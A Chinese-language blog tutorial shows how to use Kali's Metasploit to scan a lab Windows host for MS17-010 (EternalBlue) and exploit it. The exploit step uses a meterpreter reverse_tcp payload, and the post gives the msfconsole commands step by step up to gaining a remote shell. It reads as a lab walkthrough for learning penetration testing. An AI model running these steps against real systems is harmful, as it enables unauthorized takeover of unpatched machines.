French

French - 技术经验
澄其心, 断其欲, 方能悟道
  1. 首页
  2. Linux
  3. Kali
  4. 正文

08-Kali使用MSF框架利用MS17-010漏洞(永恒之蓝)

2021-03-04 1966点热度 0人点赞 0条评论

本次,我们使用Kali,来利用老生常谈的MS17-010漏洞,对靶机进行渗透

渗透环境如下:

名称系统IP地址说明
攻击机Kali192.168.100.135用于攻击其他主机的渗透机器
靶机Windows192.168.100.32攻击机攻击的目标

 

1.启动MSF框架

在终端中输入msfconsole,来启动MSF框架

2.探测目标主机是否存在MS17-010漏洞

在msfconsole中输入search MS17-010

探测目标主机是否存在MS17-010漏洞的模块为: auxiliary/scanner/smb/smb_ms17_010

通过use命令使用漏洞模块, 用法为use 模块ID, 在msfconsole中输入use 1,从而利用smb_ms17_010模块,探测目标主机是否存在MS17-010漏洞

在msfconsole中输入show options, 可以得到该模块的详细信息

使用完show options命令之后, 我们可以改模块下需要使用的信息, 我们可以通过set命令,来设置这些参数, 向msfconsole中输入set RHOSTS IP地址

这是完成之后, 向msfconsole中输入run,来运行该模块

运行完成之后, 由图可知,我们可以知晓该目标主机下存在MS17-010漏洞

2.渗透主机

完成上述两步之后,我们现在才开始真正的要使用模块,来渗透目标主机了

再次使用search命令搜索MS17-010漏洞的模块

注: 本次利用的模组为: exploit/windows/smb/ms17_010_eternalblue

通过use命令切换到该模块下

切换过程中,msfconsole提示我们没有设置反弹的shell, 所以我们需要设置他

在msfconsole中输入:  set payload windows/x64/meterpreter/reverse_tcp, 用于设置成功后反弹的shell

设置完成之后, 我们就可以开始利用msfconsole渗透目标主机了, 在此之前,我们还需要设置一下参数

在msfconsole中输入set RHOSTS 192.168.100.32

设置完成之后, 我们就可以运行该模块

如果返回的是Win,则代表我们渗透成功了, 此时他会自动进入到cmd模式下,我们可以直接在里面输入cmd命令

有图可知,我们已经入目标主机的系统中, 至于怎么玩,我就不说了,你们自己动手吧

本作品采用 知识共享署名-非商业性使用 4.0 国际许可协议 进行许可
标签: Kali MSF 安全 渗透 漏洞利用
最后更新:2021-03-15

French

这个人很懒,什么都没留下

打赏 点赞
< 上一篇
下一篇 >

文章评论

razz evil exclaim smile redface biggrin eek confused idea lol mad twisted rolleyes wink cool arrow neutral cry mrgreen drooling persevering
取消回复

COPYRIGHT © 2018-2024 French. ALL RIGHTS RESERVED.

Theme Kratos Made By Seaton Jiang

蜀ICP备2022008471号-1

川公网安备 51130202000393号